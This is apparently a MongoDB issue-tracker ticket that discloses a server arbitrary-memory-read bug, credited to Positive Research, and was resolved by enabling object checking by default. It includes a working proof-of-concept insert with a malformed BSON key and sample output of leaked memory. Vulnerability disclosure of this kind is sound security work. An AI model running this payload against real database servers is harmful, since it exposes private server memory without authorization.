Uploaded image for project: 'Core Server'
  1. Core Server
  2. SERVER-7769

use --objcheck by default, Server arbitrary memory reading

XMLWordPrintableJSON

    • Type: Icon: Bug Bug
    • Resolution: Done
    • Priority: Icon: Major - P3 Major - P3
    • 2.3.2
    • Affects Version/s: None
    • Component/s: None
    • Labels:
      None
    • ALL

      The specialists of the Positive Research center have detected "Server arbitrary memory reading" vulnerability in MongoDB application.

      Cause of incorrect execution of BSON-document length in column name in the insert command it’s possible to insert a record which can contain a base64-encrypted server memory chunks.

      Example of use:

      Suppose you have a table "dropme" with write permission.

      Execute the following command with a result:

      > db.dropme.insert(

      {"\x16\x00\x00\x00\x05hello\x00\x010\x00\x00\x00world\x00\x00" : "world"}

      )
      > db.dropme.find()

      { "_id" : ObjectId("50857a4663944834b98eb4cc"), "" : null, "hello" : BinData(0,"d29ybGQAAAAACREAAAAQ/4wJSCCPCeyFjQkRAAAAAAAAAAAAWbcQAAAAMQAAAAEAAABgcicICAAAAAcAAACgKo0JABw5NAMAAAAAAAAAAAAAAMQ3jAlmAGkAQQAAAEIAaQBuAEQAYQB0AGEAKAAxADEAOQAsACIAYgAzAEoAcwBaAEEAQQBBAEEAQQBBAD0AIgApAAAAdABSAFEAAAAiAGgAZQBsAGwAbwAiACAAOgAgAEIAaQBuAEQAYQB0AGEAKAAxADEAOQAsAC...........................ACkALAAgACIAFg==") }

      After base64-code decryption you can get bytes from random server memory chunks.

      Credits

      The vulnerability was discovered by Mikhail Firstov, Positive Research Center (Positive Technologies Company)

            Assignee:
            eliot Eliot Horowitz (Inactive)
            Reporter:
            ymaryshev Yury
            Votes:
            1 Vote for this issue
            Watchers:
            12 Start watching this issue

              Created:
              Updated:
              Resolved: